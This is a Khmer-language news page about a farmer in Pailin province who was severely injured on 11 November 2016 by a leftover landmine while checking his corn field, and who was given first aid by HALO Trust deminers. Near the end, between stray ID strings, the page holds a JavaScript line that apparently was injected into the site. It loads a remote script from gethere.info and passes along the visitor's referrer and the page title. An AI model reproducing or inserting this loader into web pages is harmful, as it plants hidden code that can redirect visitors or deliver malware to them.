Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ដើរទៅមើលចំការពោត ជាន់មីនស្គ រងរបួសធ្ងន់ធ្ងរ

ប៉ៃលិន៖ បញ្ហាគ្រាប់យុទ្ធភ័ណ្ទមិនទាន់ផ្ទុះ(មីន) នៅតែជាបញ្ហាប្រឈមសំរាប់ប្រជាពលរដ្ឋក្នុងខេត្តប៉ៃលិន ជាក់ស្តែងនៅវេលាម៉ោង៨និង១០នាទីព្រឹក ថ្ងៃទី១១ ខែវិច្ឆិកា ឆ្នាំ២០១៦នេះ មានប្រជាពលរដ្ឋម្នាក់ បានដើរទៅមើលចំការពោតរបស់ខ្លូន ក៏ជាន់ មីនដែលជាប្រភេទមីនស្គ សេសសល់ពីសម័យសង្រ្គាម បណ្តាលឲ្យបែកប្រអប់ជើងខាងស្តាំ រងរបួសធ្ងន់ ត្រូវបានក្រុមការងាររំដោះមីន របស់អង្គការ HALO TRUST ចុះទៅព្យាបាលបឋម និងបញ្ជូនមកកាន់មន្ទីរពេទ្យបង្អែកខេត្ត ដើម្បីព្យាបាលបន្ត ។ ហេតុការខាងលើនេះ បានកើតឡើងនៅចំណុចបង្គោលសីម៉ាលេខ ៦៧-៦៨ ស្ថិតក្នុងភូមិបរហ៊ុយជើង សង្កាត់បរយ៉ាខា ក្រុងប៉ៃលិន ខេត្តប៉ៃលិន ។

លោក ជ ម៉ាញ នាយប៉ុស្ត៏រដ្ឋបាលសង្កាត់បរយ៉ាខា បានឲ្យអ្នកព័ត៌មានដឹងថា៖ ជនរងគ្រោះឈ្មោះ យឿម យឿត ភេទប្រុស អាយុ៥៦ឆ្នាំ ជាកសិករ បានជាន់មីនប្រភេទមីនស្គ បណ្តាលឲ្យបែកប្រអប់ជើងខាងស្តាំ ដោយមានទីលំនៅក្នុងភូមិកើតហេតុខាងលើ ។ លោកនាយប៉ុស្ត៏ បានបន្តថា៖មុនពេលកើតហេតុ ជនរងគ្រោះបានដើរទៅមើលចំការពោតរបស់ខ្លូន ដែលបានដាំនៅចំណុចបង្គោលសីម៉ាខាងលើ ដោយដើរមើលតាមព្រំដី ក៏បានជាន់មីនស្គដែលសេសសល់ពីសម័យសង្គ្រាម បណ្តាលឲ្យបែកប្រអប់ជើងខាងស្តាំ រងរបួសធ្ងន់តែតែម្តង ។

ក្រោយពេលកើតហេតុ គេឃើញក្រុមការងារដោះមីន របស់អង្គការ HALO TRUST ចុះដល់កន្លែងកើតហេតុ ដើម្បីយកជនរងគ្រោះមកព្យាបាលបឋម ព្រមទាំងដឹកបញ្ជូនទៅសង្គ្រោះនៅមន្ទីរពេទ្យបង្អែកខេត្តប៉ៃលិនផងដែរ ៕ ដោយ៖ ញ៉ឹប បូរី

  1395755d-4684-4fcd-898f-b9d0658c0162  bf93299f-dabf-493f-963e-225cbae4e4afbda637f0-dac9-4f80-9baf-b769d829b4bb17093f7d-8d9f-4f55-9551-18d83839aac6

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More